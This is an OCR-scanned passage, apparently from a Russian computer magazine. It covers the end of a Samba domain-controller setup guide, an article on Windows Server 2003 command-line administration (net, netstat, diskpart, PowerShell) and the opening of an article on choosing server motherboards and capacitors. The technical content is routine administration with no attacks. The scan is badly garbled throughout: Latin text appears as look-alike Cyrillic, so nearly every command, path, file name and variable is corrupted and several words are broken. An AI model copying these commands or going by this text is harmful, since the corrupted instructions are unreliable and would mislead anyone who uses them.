то при дальнейшей настройке потребуются такие 
утилиты, какріп§ (для проверки доступности 
узла), шпЫоокир (для запроса имен ИеііВІОЗ) или, 
уже на крайний случай, щрбшпр, и, конечно же, 
журналы, расположенные в /ѵаі/Іо^/затЬа. Не 
стоит забывать и про права доступа. Ведь при на- 
значении для пользователя каталога /§бе До /мѵ/ 
§1иЬіпе пользователь должен зайти и в предыду- 
щие каталоги (право на выполнение) . 

Заводим пользователей 

Установив необходимую конфигурацию, 
надо создать учетные записи пользователей. 

В нашем случае данные об аутентификации 
пользователей ЗатЬа будут записаны в файл 



/еіс/затЬа/зтЬраззшб, в котором содержатся 
имена и зашифрованные пароли пользова- 
телей. Пользователи ѴѴіпбоѵѵз обязательно 
должны иметь учетную запись на Ілпих-ком- 
пьютере. Так как механизм шифрования в сетях 
ѴѴіпбоѵѵз-машин не совместим со стандарт- 
ными Шіх-механизмами, то для заполнения 
файла паролей используется отдельная утилита 
— зтЬраззшІ: 

$ зисіо изегасМ -з /Ьіп/іаізе -сі 
/іюте/ затЬа/ зегдез зегде^ 

$ зисіо зтЪраззжі -а зегде^ 

$ зисіо зтЪраззжі -е зегдез 

В этом примере добавляется новый пользова- 
тель зег§е) с фиктивной оболочкой (возможны 
варианты /зЬіп/поІо^іп, /беѵ/пиіі) и домашним 
каталогом /Ьоте/затЪа/зег^еф Затем создается 
пароль для пользователя зег^еф Последним 
шагом включаем доступ пользователя, так как 
по умолчанию он отключен. Если теперь посмот- 
реть в файл /еіс/затЬа/зтЬраззшб, можно 
увидеть новую запись. Весьма желательно с по- 
мощью сгоп создать задание, которое периоди- 
чески делало бы резервную копию этого файла. 

В системах ѴѴіпбоѵѵз по умолчанию имеется 
несколько групп с четко заданной ролью: Потаіп 
Абтіпз, Абтіпізігаіогз, ІІзегз, Оиезіз и прочие. 
Чтобы все это работало, необходимо сопоставить 
группы ѴѴіпбоѵѵз и Ілпих. Для просмотра имею- 
щихся в домене групп используем команду: 

$ зисіо пеЕ дгоиртар Іізі 
ЗузЕет ОрегаЕогз (3-1-5-32-549) 

-> -1 

Ботаіп АЬтіпз (3-1-5-21- 
497369389-3960344947-4188168368- 
512) -> -1 

Ботаіп СиезЕз (3-1-5-21- 
497369389-3960344947-4188168368- 
514) -> -І 

Ботаіп Юзегз (3-1-5-21-497369389- 
3960344947-4188168368-513) -> -1 

И так далее. Знак «-1» указывает на то, что 
пока ни одна группа не сопоставлена. Обрати 
внимание на цифры. Этот так называемые 
затЪаРгітагуСгоирЗГО и затЪаЗГО. 5ГО 
— зесигііу ібетШег, в ѴѴіпсІоѵѵз является неким 
аналогом ИГО в Ілпих, уникальным для всей 
сети. Получить его можно командой: 

$ зисіо пеЕ деЕІосаІзісі 

Последние три цифры Потаіп Асітіпз «5 12» 

— это так называемый КТО (геіагіѵе ібепіШег) , 
уникальный идентификатор пользователя доме- 
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на. Его рекомендуется указывать при сопоставле- 
нии пользователей. Чтобы управлять доменом, 
нам нужно сопоставить группу Ілпих с Потаіп 
Абтіпз. Можно использовать уже имеющиеся 
группы, или создать специальную для работы в 
домене, чтобы затем было легче разобраться: 

$ зибо дгоирабб (Іота і п_абті п з 
$ зисіо пеБ дгоиртар тобіБу 
пБдгоир= " Ботаіп Абтіпз " 
ипіхдгоир=(Іотаіп_а(Ітіпз 

Можно и так: 

$ зисіо пеБ дгоиртар абб зіб=8- 
1-5-21-497369389-3960344947- 
4188168368-512 ипіхдгоир=(Іотаіп_ 
абтіпз Буре=ботаіп 

Аналогичные команды вводим при сопос- 
тавлении других пользователей, только 
включаем их в Эотат ІІзегз. Кстати, 
ѴѴіпбоѵѵз не допустит, чтобы имя пользова- 
теля совпадало с именем группы. Можно 
сопоставить нескольких пользователей 
ѴѴіпбоѵѵз с одним пользователем Ілпих, для 
этого создается файл /еіс/зтЪизегз.тар. 

В нем отдельной строкой задается каждое 
сопоставление: 

пользователь^ Біпих = изег_ѵ\/іп1 
изег_ѵ\/іп2 изег_ѵИпБ 

А в секции §1оЬа1 добавь строку «изегпате тар 
= /еіс/зтЪизегз.тар». Команда для создания 
новой доменной группы практически 
аналогична: 

$ зисіо пеБ дгоиртар абб 
пБдгоир= " Заіез " ипіхдгоир=с!отаіп_ 
заіез Буре=б 

Параметр Іуре определяет тип группы и может 
принимать два значения: сі (ботаіп §1оЪа1) и 1 
(ботаіп Іосаі) . Для удаления доменной группы 
вводим «пеі дгоиртар беіеіе» с указанием 
названия группы. 

При использовании ЗатЪа (в отличие от 
ѴѴіпбоѵѵБ 2003) компьютеры также следует 
заносить вручную. Для этого стоит создать еще 
одну группу (например, ботаіп_сотриі:ег5), 
пользователи, входящие в которую, и будут 
компьютерами: 

$ зисіо дгоираскі ботаіп_сотриБегз 
$ зисіо изегабб -С бота і п_с отриБ е г з 
-з /Ъіп/Баізе -б /беѵ/пиіі сотр1$ 

$ зибо раз зѵ^б -1 сотр1$ 

$ зибо зтЬраззѵ^б -а -т сотрі 



При добавлении системного пользователя зна- 
чок «$» в конце имени обязателен. Добавляем 
пользователя зег§е) в группу Иотаіп Абтіпз и 
проверяем: 

$ зибо пеБ грс дгоир тетЬегз 
" Ботаіп Абтіпз " -Б зегдез%раззѵ\гогб 

Теперь добавляем компьютер в домен: 

$ зибо пеБ грс зоіп - 
Бзегдез %раззтлгогб 

Проверить подключение можно командой 
пеі грс Іезп’оіп. Итак, пользователи созда- 
ны. По умолчанию группа Потаіп Абтіпз 
имеет права только на раздачу привиле- 
гий. Список всех предоставленных приви- 
легий можно просмотреть командой: 

$ зибо пеБ грс гідкБз ІізБ ассоипБз 
-Б зегдез%раззѵгогб 

А список возможных привилегий так: 

$ зибо пеБ грс гідЪБз ІізБ -Б 
зегде^ %раззѵгогб 

ЗеМасЪйпеАссоипБРгіѵіІеде Абб 
тасМпез Бо ботаіп 

ЗеРгіпБОрегаБогРгіѵіІеде Мападе 
ргіпБегз 

ЗеАббБзегзРгіѵіІеде Абб изегз апб 
дгоирз Бо ББе ботаіп 

ЗеКетоБеЗБиБбоѵтРгіѵіІеде Рогсе 
зБиБбоѵт Бгот а гетоБе зузБет 

ЗеБізкОрегаБогРгіѵіІеде Мападе 
бізк зкагез 

ЗеВаскирРгіѵіІеде Васк ир Бііез 
апб бігесБогіез 

ЗеКезБогеРгіѵіІеде КезБоге Бііез 
апб бігесБогіез 

ЗеТакеОѵтегзМрРгіѵіІеде Таке 
оѵтегзМр оБ Бііез ог оБЬег окдесБз 

Чтобы иметь возможность полноценно работать, 
сначала нужно даровать самим себе все права: 

$ зибо пеБ грс гідЪБз дгапБ 
" зегѵег . сот\ Ботаіп Абтіпз " 
ЗеМасМпеАссоипБРгіѵіІеде 
ЗеРг іпБОрегаБогРг і ѵі Іеде 
ЗеАббБзегзРгіѵіІеде 8еКетоБе8ЪпБбоѵ\/ 
пРгіѵіІеде ЗеБізкОрегаБогРгіѵіІеде 
ЗеВаскирРгіѵіІеде 
ЗеКезБогеРгіѵіІеде 
ЗеТакеОжіегзМрРгіѵіІеде -Б 
зегде^ %раззѵгогб 
ЗиссеззБиІІу дгапБеб гідкБз. 



Вот, собственно, и все. Теперь у нас есть контрол- 
лер домена под управлением Ілпих, пользовате- 
ли, обладающие необходимыми правами, и до- 
ступные сетевые ресурсы. Стоит также отметить, 
что имеются графические инструменты, позво- 
ляющие упростить настройку ЗатЪа. Это 5ѴѴАТ, 
входящий в состав ЗатЪа (требуется установить 
пакет ЗАѵаі), и универсальный ѴѴеЪтіп. Послед- 
ний, кроме контроля и основных настроек, имеет 
еще ряд полезных возможностей, например авто- 
матическое конвертирование пользователей и 
групп Ілпих в ѴѴіпбоѵѵз. Успехов. □С 



ПЕРЕМЕННЫЕ В ЗАМВА 
В секции §1оЪа1 возможно использование 
различных переменных для более гибкой 
настройки работы сервера. После установ- 
ки соединения вместо них подставляются 
реальные значения. Например, в директиве 
«1о§ Ше = /ѵаг/1о§/5атЪа/%т.1о§» пара- 
метр %т помогает определить отдельный 
лог-файл для каждой клиентской машины. 
Приведу наиболее часто используемые пере- 
менные секции §1оЪа1: 

%а — архитектура ОС на клиентской машине 
(возможные значения: ѴѴіп95, ѴѴіп ИТ, 
ШКШѴШит.д.); 

%т — ИеіВІОЗ-имя компьютера клиента; 

%Ь — ИебЗЮЗ-имя сервера ЗатЪа; 

%ѵ — версия ЗатЪа; 

%І — ІР-адрес компьютера клиента; 

%Т — дата и время; 

%и — имя пользователя, использующего 
сервис; 

%Н — домашняя директория 
пользователя %и. 

Для более гибкой настройки применяется 
директива іпсіибе, использующая приведен- 
ные выше переменные. Например, «іпсіибе 
= /еіс/5атЪа/5тЪ.сопІ.%т>> — теперь при 
запросе с компьютера заіез при наличии фай- 
ла /еіс/затЪа/зтЪ.сопІ.заІез конфигурация 
будет взята из этого файла. 

Также имеется интересная возможность 
создания виртуального сервера. Для этого 
используется параметр пеіЪіоз аііазез: 

пеБЬіоз аііазез = заіез ассоипБіпд абтіп 

Также указываем серверу использовать для 
каждого виртуального сервера свой конфи- 
гурационный файл: 

іпсіибе = /еБс/затЬа/зтЬ. сопБ . %Б 

Теперь в окне обозревателя сети будет видны 
три сервера: заіез, ассоипііп^, абтіп. 
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ДЕНИС КОЛИСНИЧЕНКО 

/ 0Н8П.АВ8@МАП..КІІ / 



Меняем окна 
на консоль 



АДМИНИСТРИРОВАНИЕ ѴѴІЫ00ѴѴ5 2003 ИЗ КОМАНДНОЙ СТРОКИ 



Парадоксально, но факт: утилиты командной строки в ѴѴіпсІоѵѵз никогда не привлекали внимания ни 
пользователей, ни администраторов, но в тоже время состав и возможности этих утилит обогащаются 
каждый год. 



О том, как работать в командной строке 

Наиболее часто используемой утилитой коман- 
дной строки является сам командный интер- 
претатор — спкіехе. Именно его мы запускаем, 
когда нам нужно поработать с командной 
строкой. Интерпретатор стб пришел на смену 
соттапб.сот из мира ЭОЗ и ѴѴіпсіоѵѵб 9х. 
Когда торопишься или просто не хочешь 
ждать завершения первой команды, можно 
ввести сразу несколько команд, разделив их 
амперсандом: 

командаі & команда2 & ... & ко- 
мандам 

Если эту последовательность команд прихо- 
дится выполнять часто, целесообразно создать 
командный файл — обычный текстовый файл с 
расширением стб. Каждая команда записыва- 
ется в отдельной строке, но можно и использо- 
вать амперсанды. 

Иногда нужно проанализировать результат 
первой команды, а только потом, если ре- 
зультат успешен, выполнить вторую команду. 
Это можно реализовать с помощью двойного 
амперсанда: 



командаі && команда2 

Вторая команда будет выполнена, если код 
завершения первой команды равен нулю (ус- 
пешное завершение) . 

Не успел прочитать, что написала тебе про- 
грамма? Тогда вывод можно передать програм- 
ме тоге для постраничного просмотра (листать 
нужно пробелом) : 

команда I тоге 

Символ « | » используется для перенаправления 
стандартного вывода одной команды на стан- 
дартный ввод другой. Что будет делать с этим 
выводом другая программа, зависит только 
от нее. 

Для перенаправления вывода команды в файл 
используются символы « > » и « > > »: 

команда > файл 
команда » файл 

В первом случае файл, если он существует, 
будет перезаписан, а во втором информация 
будет добавлена в конец файла. Для подавления 



вывода команды можно перенаправить вывод в 
пустое устройство: 

команда > ЖЛ. 

Для очистки экрана командной строки удобно 
использовать команду сіз. 

Команды бывают внутренними и внешними. 
Внутренние команды выполняет сам стсі.ехе. 
Внешние команды — обычные исполняемые 
ехе-файлы на диске. Когда мы вводим команду, 
стб определяет, что это за команда. Если внут- 
ренняя, то он выполняет ее сам, если внешняя, 
тогда стсі производит поиск исполняемого 
файла в текущем каталоге и по пути поиска 
программ (переменная окружения РАТН) . 
Просмотреть содержимое переменной РАТН 
можно так: 

есйо % РАТН % 

Команды для управления 
операционной системой 

В Шіх есть очень полезная программа 
зЬиМошп. С ее помощью можно не только 
завершить работу системы (или перезагрузить 
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ее), но и указать время завершения. Аналог 
этой команды есть и в АЛЙпбошз. С ее помощью 
можно просто выключить систему, выполнить 
перезагрузку, убить активных пользователей, 
перейти в режим пониженного энергопот- 
ребления и закончить сеанс без отключения 
компьютера. Очень полезен параметр Ч', 
позволяющий задать в секундах тайм-аут 
операции. 

К командам этой группы также относится 
программа Іазккііі, которая используется для 
завершения/убийства работы одного или 
нескольких процессов. Задать процесс можно 
по имени образа (имени исполняемого файла 
— ключ ‘/ІМ’) или по идентификатору процесса 
(ключ Урій’) . Например: 

казккііі /ІМ покерасі.ехе 

Вообще говоря, возможностей у этой команды 
очень много. К примеру, можно завершить все 
процессы, которые используют определенную 

ви,. 

Команды мониторинга 

Как было отмечено, команде газккііі нужно пе- 
редать имя образа или РГО процесса. Узнать РГО 
процесса можно с помощью команды Іазкіізі. 
Также к командам мониторинга можно отнес- 
ти: теш (вывод информации об использовании 
памяти), зузіетіпіо (полная информация о 
системе) и Ігасегрі (отслеживание журнала 
событий с возможностью вывода отчета в 
формате СЗѴ) . 

Сетевые команды 

В ѴѴіпсіоѵѵб довольно много программ для 
диагностики и мониторинга сети, причем неко- 
торые администраторы даже не подозревают 
об их существовании: 
агр — управление АКР-таблицей; 
ріп§ — отправка ІСМР-пакетов на указанный 
узел для проверки его доступности; 



ріп§6 — версия ріп§ для протокола ІРѵб; 

Ігасегі — трассировка маршрута к указанному 
узлу; 

ІгасегТб — версия Ігасегі: для протокола ІРѵб; 
раі!іріп§ — усовершенствованная версия 
Ігасегі; 

пеі — управение сетью из командной строки; 
пзкоокир — просмотр записей ПИЗ-сервера; 
пеізіаі — вывод информации о сети; 
ірсопй§ — вывод информации о настройках 
протокола ІР; 

готе — вывод и изменение таблицы 

маршрутизации; 

пеізЬ (гоілетоп) — управление 

маршрутизатором. 

Особого внимания заслуживают команды пеі: и 
пеізіаі. С помощью первой можно произвести 
много различных операций. Введи команду 
пеі без параметров — в ответ получишь список 
команд: 

ассоипіз — используется для обновления базы 
данных регистрационных записей и изменения 
параметров входа в сеть; 
сотриіег — добавляет или удаляет компьюте- 
ры из базы данных домена N7; 
сопй§ — выводит информацию о службах 
сервера или рабочей станции; 
сопйпие — активизирует службу, ранее приос- 
тановленную с помощью команды пеі раизе; 

Ше — используется для установки и снятия 
блокировки с совместно используемого файла, 
а также для вывода списка блокировок; 

§гоир — выводит информацию о глобальных 
группах сервера, также используется для изме- 
нения глобальных групп; 

1оса1§гоир — управляет локальными группами 

на локальном компьютере; 

пате — управляет псевдонимами этого 

компьютера; 

раизе — приостанавливает выполнение задан- 
ной службы, продолжить работу службы можно 
с помощью команды пеі сопііпие; 
ргіпі: — управляет очередью печати; 



зепсі — отправляет короткое сообщение поль- 
зователям (или конкретному пользователю) 
сети; 

зеззіоп — управляет сеансами связи этого ком- 
пьютера с другими компьютерами; 
зйаге — разрешает/запрещает использовать 
ресурсы этого компьютера другим компьюте- 
рам сети; 

зіагі: — запускает остановленную сетевую 
службу; 

зіор — останавливает службу; 
зіаіізіісз — выводит журнал статистики для ло- 
кальной службы рабочей станции или сервера; 
Ііте — синхронизирует время этого компьюте- 
ра с временем другого компьютера сети; 
изе — используется для подключения общих 
ресурсов другого компьютера сети; 
изег — создает и изменяет учетные записи 
пользователя, используется только на сервере; 
ѵіеѵѵ — выводит список общих ресурсов этого 
компьютера. 

Получить справку по конкретной команде 
можно так: 

пек Ьеір имя_команды 

Теперь поговорим о команде пеізіаі:. Она вы- 
водит статистику использования сети и отоб- 
ражает информацию о текущих соединениях. 
Представим, что на твоем компьютере закрыты 
все приложения, которые могут обращаться к 
сети, а обращение к ней все равно происходит, 
о чем свидетельствуют индикаторы в зузіет 
ігау. Введи команду «пеізіаі-о» и узнаешь, какая 
программа это делает (параметр '-о' использу- 
ется для вывода РГО процесса) . 

Команды обслуживания жестких дисков 

Для проверки дисков используются команды 
сЬкбзк (проверка РАТ-разделов) и сйкпіГз (про- 
верка ИТРЗ-разделов), для дефрагментации 
— беіга§. гесоѵег применяется для восстанов- 
ления файлов с поврежденных разделов, а всем 
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известная команда іогтаі: — для форматирования дисков. 
Вместо команды ібізк, которая была в ѴѴіпбоѵѵз 9х, в 
современных версиях ѴѴіпбоѵѵз используется сНзкрагТ. Эта 
программа позволяет разбить диск на разделы, создать /уда- 
лить логические диски, выбрать активный раздел и т.д. Если 
команда ібізк работала в интерактивном режиме, то бізкрагі: 
в основном ориентирована на использование в сценариях. 
Сценарии — это текстовые файлы с инструкциями, которые 
должна выполнить сИзкрагГ. Вызвать сИзкрагГ можно так: 

сііз краг С /з <имя_сценария> 

ПРИМЕР СЦЕНАРИЯ 0І5КРАРТ 

зеІесС сіізк О 
сіеап 

сгеаке рагкікіоп ргішагу 

зеіеск рагкікіоп 1 

аззідп 1еккег=с : 

аскіѵе 

іогтак 

ехік 

Обрати внимание, как здесь осуществляется работа с объ- 
ектами. Сначала с помощью команды зеіесі: мы выбираем 
диск (зеіесі: сіізк) . Затем мы производим две операции (сіеап 
и сгеаЩ рагййоп) . Далее выбираем другой объект — раздел 
(зеіесі: раггігіоп) и производим операции с ним (делаем 
раздел активным и форматируем его) . 

Можно указать размер создаваемого раздела (в данном 
случае 5 Гб), например: 

сгеаке рагкікіоп ргішагу зІ2е=5000 

К этому разделу можно отнести еще две команды: 
бізкрегі, которая управляет счетчиками произво- 
дительности жесткого диска, и ізиШ, управляющую 
поведением файловой системы. Например, с помощью 
ізиШ можно сбросить или установить флаг тома «гряз- 
ный» (сіігіу), а также получить информацию о файловой 
системе. 

Команды для поддержки 
и диагностики Асііѵе Оігесіогу 

В ѴѴіпбоѵѵз 2003 для управления службой каталога использу- 
ются так называемые ЭЗ-утилиты: 
бзциегу — выводит список объектов Асйѵе ЭігесЮгу по 
заданным параметрам поиска; 

бз^еі: — возвращает атрибуты заданного объекта Асйѵе 
ЭігесШгу, может принимать на стандартный ввод стандарт- 
ный вывод команды бздиегу; 

бзабб — добавляет один или несколько объектов Асйѵе 
Эігесюгу; 

бзтоб — модифицирует атрибуты существующего объекта; 
бзтоѵе — перемещает объект из одного домена в другой; 
бзгт — удаляет один или несколько объектов; 

Синтаксис всех ЭЗ-команд похож, используй «/?» для полу- 
чения справки. 



Для диагностики контроллера домена (ЭС) используется 
утилита ЭсЭіа§ из комплекта Зиррой Тооіз. Если запустить 
ее без параметров, то запустится 27 тестов ЭС (к слову, в 
\Уіпбо\ѵз 2000 было 22 теста) . 

Другие команды 

Для выполнения заданной команды в строго определенное 
время можно использовать планировщик ай Есть воз- 
можность задать дату запуска команды, время, интервал 
(например, каждый день) . Программа может работать в 
интерактивном режиме (параметр /ітегасйѵе) . 

Если боишься редактировать файл Ъоойіпі в блокноте, вос- 
пользуйся программой ЬооЩ%, которая позволяет избежать 
ошибок при редактировании этого файла. 

Иногда полезно опросить драйверы устройств. Для этого 
используется команда бгіѵещиегу. 

ѴѴіпбоѵѵз РоѵѵегБНеІІ 

Возможности стандартного командного интерпретатора 
стб в ѴѴіпболѵз довольно скудны, особенно по сравнению 
с командными интерпретаторами ІІпіх: кзіі, ЬазЬ, гзй. В 
МісгозоЙ это тоже понимают, поэтому была разработа- 
на оболочка Мопаб, она же МЗН, которая впоследствии 
была переименована в ѴѴіпбоѵѵз РолѵегЗЬеИ. Установить 
МЗН можно на следующих платформах: ѴѴіпбоѵѵз ХР 
ЗР2, ѴѴіпбоѵѵз Ѵізііа, ѴѴіпбошз Зегѵег 2003 и ѴѴіпбоѵѵз 
Зегѵег Ьоп^іюгп. Скачать РоѵѵегЗйеІІ можно по адресу 
ѵ\л/\лѵ.тісгозоійсотАѵіпбоѵ\/ззегѵег2003/тсЬпо1оуіез/ 
тапауетет/роѵѵегзііеіі/беіаиійтзрх . Там же ты найдешь и 
полное руководство по ней. 

Оболочка РоѵѵегЗЬеІІ — это интерактивный командный 
интерпретатор. С его помощью можно создавать сцена- 
рии, позволяющие администраторам автоматизировать 
управление системными задачами как на сервере, так и на 
других компьютерах сети. РоѵѵегЗЬеІІ, в отличие от стб, 
предоставляющего доступ только к файловой системе, 
позволяет управлять всей операционной системой и ее 
приложениями. Например, мы можем работать с реестром 
ѴѴіпбоѵѵз как с обычной файловой системой. Вот некоторые 
полезные команды, которые нужно знать для начала работы 
в РоѵѵегЗЬеІІ: 

СейСоттапб — получить список доступных команд; 
СейНеІр — получить справку по указанной команде; 
СейНгіѵе — получить список дисков; 

ЗейЬосайоп — изменить текущее местоположение (аналог 
команды сб в стб) ; 

ЗейАІіаз — создать псевдоним для команды; 

Сеі-Наіе — вывести дату. 

Как и в стб, поддерживается перенаправление ввода/выво- 
да, например: 

Сек-Баке > сиггепк-баке . кхк 

При запуске РошегЗЬеІІ автоматически запускаются следую- 
щие сценарии (если они найдены) : 

• Носитешз апб Зетп§з\А11 ІІзегз\Носитепі:з\М5Іі\ргоШе.т5Іі; 

• НоситеШз апб Зе№п§5\А1Шзег5\НоситепЩ\Мз]і\Місго5о{й 
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Мапа^етепС .Атотайоп.тз1і_ргоШе . тзЬ; 

• $НОМЕ\Му ПоситепСзХтзЬХргоШе.тзІі; 

• $НОМЕ\Му ПоситепСзХтзіЛМісгозоіі:. 
Мапа^етепі; .АиСотаСіоп . тзіі_ргоШе . тзЬ . 
Сценарий — это обычный текстовый файл, содер- 
жащий команды РоѵѵегЗЬеІІ. Расширение у файла 
сценария должно быть ігай. Синтаксис РошегЗЬеІІ 
похож на синтаксис любого другого языка высоко- 
го уровня. Рассмотрим несколько примеров: 

МЗН> 5*5 
25 

М8Н> "Конкатенация" + "строк" 
Конкатенация строк 
М8Н> (СеР-БаРе) .уеаг * 5 
10035 

Можно работать с переменными, причем под- 
держиваются массивы: 

МЗН> $Р = 10 
мзн> $р 
10 

МЗН> $агг = 1,2 
МЗН> $агг 
1 
2 

МЗН> $агг [1] = 3 
М8Н> $агг 
3 
2 

Перед именем переменной нужно обязательно 
указывать знак доллара — так РоѵѵегЗйеІІ пой- 
мет, что перед ним переменная, а не значение. 
Нумерация элементов массива начинается 
с единицы. Для доступа к элементу массива 
используются квадратные скобки, для добавле- 
ния нового элемента в массив — оператор « + » : 

М8Н> $агг += 7 
МЗН> $агг 
3 
2 
7 

Кроме простых массивов, поддерживаются 
ассоциативные массивы: 

М8Н> $аззос = @{ опе = 1; Ртлго = 2; 
Рйгее = 3 } 

М8Н> $аззос [ 1 опе 1 ] 

1 



Для добавления элемента в ассоциативный 
массив используется вот такая конструкция: 

$аззос += @{ Роиг = 4 } 

Тип переменной выбирается автоматически, но 
можно установить любой тип .ИЕТ: аггау, Ъооі, 
Ъусе, сйаг, сЬаг[], бесітаі, боиЫе, Йоаі, тс, іпі: [] , 
1оп§, 1оп§[],ге§ех, зіпДе, зсгірсЫоск, 5Сгіп§, суре, 
хті. Он определяется в квадратных скобках в 
момент присваивания: 

МЗН> $ѵаг = [ іпР ] 10; 

В сценариях можно использовать условные опе- 
раторы іі-еізеіі-еізе, зѵѵіссіі, а также операторы 
циклов ѵѵЫІе, бо-ѵ\/Ы1е, бо-ипсіі, іогеасй. 

Мы рассмотрим только оператор й-еізей-еізе и 
циклы ѵѵЫІе и ібгеасЬ. Конструкция й-еІзеіТеІзе 
следующая: 

ІР (условие) {операторы 
} еІзеіР (условие) {операторы 

} еІзеіР (условие) {операторы 
} еізе {операторы} 

Условие задается так: 

переменная оператор_сравнения пе- 
ременная_или_значение 

Цикл ѵйіііе выглядит так: 

ѵбіііе {условие} {операторы} 

Пример: 

$1 = 0; ѵбіііе ( $і -ІР 10) { $і; $і + + } 

Этот цикл выведет числа от 0 до 9. 

Теперь рассмотрим синтаксис іогеасй: 

РогеасЬ. (переменная іп ассоциатив- 
ный_массив) {операторы} 

Цикл іогеасй удобно использовать для перебора 
значений ассоциативного массива, например: 

РогеасЬ ( $ѵ іп СеР-Ргосезз ІЗогР- 
ОРдесР Баше) { $ѵ.Ыаше } 

А сейчас поговорим о работе с реестром. 



Перейти в нужный раздел можно с помощью 
всем знакомой команды ей: 

М8Н> ссі Ькси: 

Мы попали в раздел НКЕУ_СШКЕПТ_ПЗЕК. 
Можно перейти в другой раздел, например 
НКЕУ_ШСАЬ_МАСНШЕ, задав его имя или 
сокращение (Ыбт) . Вывести содержимое 
раздела можно с помощью команды сііг. Чтобы 
просмотреть его, используется команда 
§еС-ргорегСу: 

М8Н> ей Ькси: 
8оРРѵ\/агеМісгозоРР№эРерас1 
М8Н> деР-ргорегРу . 

В данном случае мы выводим настройки блок- 
нота. Значение переменной в разделе устанав- 
ливается посредством зес-ргорегсу (следующая 
команда изменит шрифт блокнота) : 

М8Н> зеР-ргорегРу . — ргорегру 
ІРРасеБате -ѵаіие "АгіаІ" Ш-И 



КОМАНДЫ ДЛЯ РАБОТЫ С ФАЙЛОВОЙ 

СИСТЕМОЙ 

іуре — просмотр файла; 

тоге — постраничный вывод файла; 

сору — копирование одного или нескольких 

файлов; 

тоѵе — перемещение одного или несколь- 
ких файлов (или переименование каталога); 
беі — удаление одного или нескольких 
файлов; 

геп — переименование файла; 
ассгіЪ — изменение атрибутов файла/ката- 
лога (скрытый, системный, только чтение, 
архивный); 

іс — сравнение файлов; 

Япб — поиск текстовой строки в одном или 
нескольких файлах; 

§гер — поиск текстовой строки (можно ис- 
пользовать регулярные выражения) в файле 
или в списке файлов; 
ссі — смена каталога; 
сііг — вывод содержимого каталога; 

Сгее — вывод дерева каталогов; 
тб (или ткбіг) — создание каталога; 
гб — удаление каталога или дерева 
каталогов. 
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» ХАКЕР.РКО 




Чудеса 
селекционной 

РАБОТЫ 



СТРАТЕГИЯ ВЫБОРА МАТЕРИНСКОЙ ПЛАТЫ И ЖЕСТКИХ ДИСКОВ ДЛЯ СЕРВЕРА 



Как среди тысяч материнских плат и сотен наименований жестких дисков выбрать модели, наилучшим 
образом подходящие для сервера? Да еще при достаточно скудном бюджете? Промышленные серверы 
от крупных производителей не предлагать — они просто не стоят тех денег, которые за них просят. При 
достаточном опыте общения с железом надежный сервер можно собрать и самостоятельно. Вот об этом са- 
мом опыте (удачных находках, досадных ошибках и неожиданных разочарованиях) мыщъх и собирается 
рассказать. 



По существу, сервер — это обыкновенный ПК с 
операционной системой ѴѴіпсІоѵѵз/Ілпих/ВЗН 
и набором программного обеспечения типа 
ІІЗ/АЪузз/ѴѴаг-РТР/АрасЬе/ЗепсІтаіІ. Не сек- 
рет, что большинство серверов, стоящих на вит- 
ринах компьютерных магазинов, собираются 
местными умельцами при помощи молотка 
и мата. Естественно, качество такой продук- 
ции оставляет желать лучшего, а настоящие 
серверы от Зип, Ве\\ и НР далеко не каждому по 
карману, особенно если это приватный Нр, не 
приносящий никакой выгоды и подпитывае- 
мый одним лишь энтузиазмом. 

Собрать нормальный сервер из ширпотреб- 
ных компонентов вполне реально. Главное не 
забывать, что, в отличие от обычных компьюте- 
ров, сервер ориентирован на круглосуточную 
работу, поэтому требования к надежности 
комплектующих намного выше. Широко 



распространенное заблуждение гласит, что 
брендовое имя на стикере автоматически 
гарантирует надежность, избавляя нас от 
проблем, присущих дешевым моделям. Однако 
даже если мы имеем дело с подлинным брендом 
(а не с его грубой подделкой), надеяться на «ма- 
гические свойства» громкого имени, право же, 
слишком наивно. Чтобы не попасть впросак, 
потребитель должен знать, чем хорошая мате- 
ринская плата визуально отличается от плохой. 
Другой важнейший компонент системы — жес- 
ткие диски, от которых зависит буквально 
все. Но оценить, сколько проработает тот или 
иной винчестер, не так-то просто! Остается 
либо слепо верить рекламе, либо обратиться 
за советом к специалистам, любезно предоста- 
вившим журналу эксклюзивную информацию, 
которой не располагает никто другой. Но не 
будем забегать вперед. До жестких дисков 



мы еще доберемся, но только после того, как 
разберемся с материнскими платами, разнеся 
их в пух и прах. 

Электронная оснастка 

Берем материнскую палату в руки и смотрим: 
если на северном мосте (большая микросхема, 
соседствующая с процессором) установлен 
вентилятор, посылаем ее в /беѵ/пиіі, не 
дожидаясь пока вентилятор выйдет из строя 
(а он обязательно выйдет, причем достаточно 
скоро), вызывая перегрев северного моста и 
дикие глюки, зачастую сопровождающиеся 
потерей данных. Причем в связи с тенденцией 
производителей использовать нестандартные 
вентиляторы реанимация платы из триви- 
альной операции по пересадке «Карлсона» 
превращается в серьезную инженерную задачу, 
требующую навыков работы с металлом. Лучше 
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> Внутри домашнего сервера 



> Отличная материнская плата с МОЗРЕТ'ами, посаженными на 
массивные радиаторы, танталовыми конденсаторами и большим 
количеством керамики 



всего выбирать модели с пассивным охлажде- 
нием, то есть с радиатором без вентилятора. 
Однако тут есть один подвох — крошечный 
радиатор, установленный на двухсторонний 
скотч (который сам по себе является весьма 
неплохим теплоизолятором), навряд ли обеспе- 
чит бесперебойную работу сервера в режиме 
24 часа 7 дней в неделю. Наличие двухсто- 
роннего скотча выдает отсутствие следов 
крепления радиатора к плате, ну а массивность 
радиатора приходится оценивать на глаз. 
Естественно, пассивное охлаждение легко 
превратить в активное, закрепив вентилятор на 
шарикоподшипниках, но зачем же извращать- 
ся, если можно сразу купить нормальную плату? 
Разобравшись с северным мостом (на южный 
мост радиатор практически никогда не ста- 
вится, но если он там установлен, это просто 
замечательно), посмотрим, что за конден- 
саторы стоят в цепях питания и, главное, где 
именно они стоят. Огрубляя, все электролити- 
ческие конденсаторы можно разделить на два 
типа: алюминиевые и танталовые (іапіаіит 
сарасйог) . 

Танталовые (такие маленькие «бочоночки» 
с синей или черной полоской на верхушке) 
значительно лучше алюминиевых: они обла- 
дают существенно меньшим эквивалентным 
последовательным сопротивлением (Е5К), 
способны работать при повышенных темпера- 
турах, менее болезненно относятся к неотфиль- 
трованной высокочастотной составляющей и 
не вздуваются, когда МОЗРЕТ'ы уходят в утечку. 
Стоят они намного дороже алюминиевых и ус- 
танавливаются только в высококачественные 
материнские платы. Маркировку танталовых 
конденсаторов легко найти в любом каталоге 
электронных компонентов. 

Желательно, чтобы танталовые конденсаторы 
располагались как можно дальше от всевоз- 
можных источников тепла: радиаторов процес- 
сора и северного моста, МОЗЕЕТ'ов и т.д. А вот 
для их алюминиевых собратьев это требование 
